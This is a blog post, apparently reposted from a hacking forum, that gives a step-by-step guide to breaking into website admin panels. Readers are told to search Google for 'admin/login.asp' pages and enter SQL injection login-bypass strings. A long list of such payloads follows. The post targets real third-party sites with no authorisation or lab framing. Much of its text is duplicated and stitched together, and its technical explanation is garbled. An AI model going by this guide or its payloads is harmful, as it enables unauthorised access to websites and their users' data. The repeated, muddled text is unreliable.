4:51 AM
![[Image: star.gif]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vUMHqX5MfRlI_h81AQL-VL7T510vMNfp5Salg6RiTRX8INAzT3wJTXoXPl5du2ntcFLkT7vcENAOHilMg00KPYCdkRoTdkExo-3ublyJbWsiXJ7iSX=s0-d)
![[Image: ub3rstar.gif]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vSoioDaogO14fJa-adlSubC2UMcNP_RBMRaF5L9730crHfwY2z1OAsgTnyyzC640CkpoCEd0CaR-dslqXtgLaRpvyvQ39f9TA_sHDfzwqAQvct7LU1m-lKzg=s0-d)
Basic SQL Injection Attack
For those people who just don't like to read much. I come straight to the point. 
We're gonna hack into an admin account, using SQL injections.
How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.
Step 1: Go to Google, typ in ''admin/login.asp'' and search (You can also use the option, to search only in your country).
![[Image: GkatiJB.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uuB8cttt8wW8T9EQ2DJ2zhY4GUYfP2z5Nr5ZQ44QOnIYzeNRrDXCQuTLgfsTY-8F9sW3JCOmAceVQjmvzrWIhKig=s0-d)
Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''google.com/admin/login.asp''.
Step 3: Go to the website admin login page, typ in:
Username: admin
Password: 1'or'1'='1
![[Image: Vl05pX5.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ubq_5dHe4upkFLqMWCXEjAMPFLQC_ijGPKJIHhno3U_N7R1pcDV5zF2qoNbQ0ypLzMzJYawE6FHzD3VkM01M7_yw=s0-d)
Well done!! Your now logged in as ADMIN:
![[Image: kvv09kG.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uHYeZ2rCu0C_lZlyoWkEuF21pBweyVAMpmcrZ6OfhNgCTfSey4FTU1IAtJN7vHfm_uQZSdkMmQxxgqoRJFED4KSg=s0-d)
![[Image: Heq2Tgg.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s8-9wksBKkdQlY5gjEGLwtDiPIfG4EtBB6lOlxYYc4f5P3fV9u77wPXcyR706-TJXxCmXL0JLXSeK2St63s7i1Og=s0-d)
If it's not working, I've listed other possible injections below. Type these in under ''Password''.
List of injections:
How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.
Step 1: Go to Google, typ in ''admin/login.asp'' and search (You can also use the option, to search only in your country).
Spoiler (Click to Hide)
Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''google.com/admin/login.asp''.
Step 3: Go to the website admin login page, typ in:
Username: admin
Password: 1'or'1'='1
Spoiler (Click to Hide)
Well done!! Your now logged in as ADMIN:
Spoiler (Click to Hide)
If it's not working, I've listed other possible injections below. Type these in under ''Password''.
List of injections:
Spoiler (Click to Hide)
admin'--
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Note: Websites that record false logins, this is not gonna work on.
I made it simple as it is guys, no long story's.
Post below, for any questions/suggestions/feedback and enjoy!
Post below, for any questions/suggestions/feedback and enjoy!
0 comments:
Post a Comment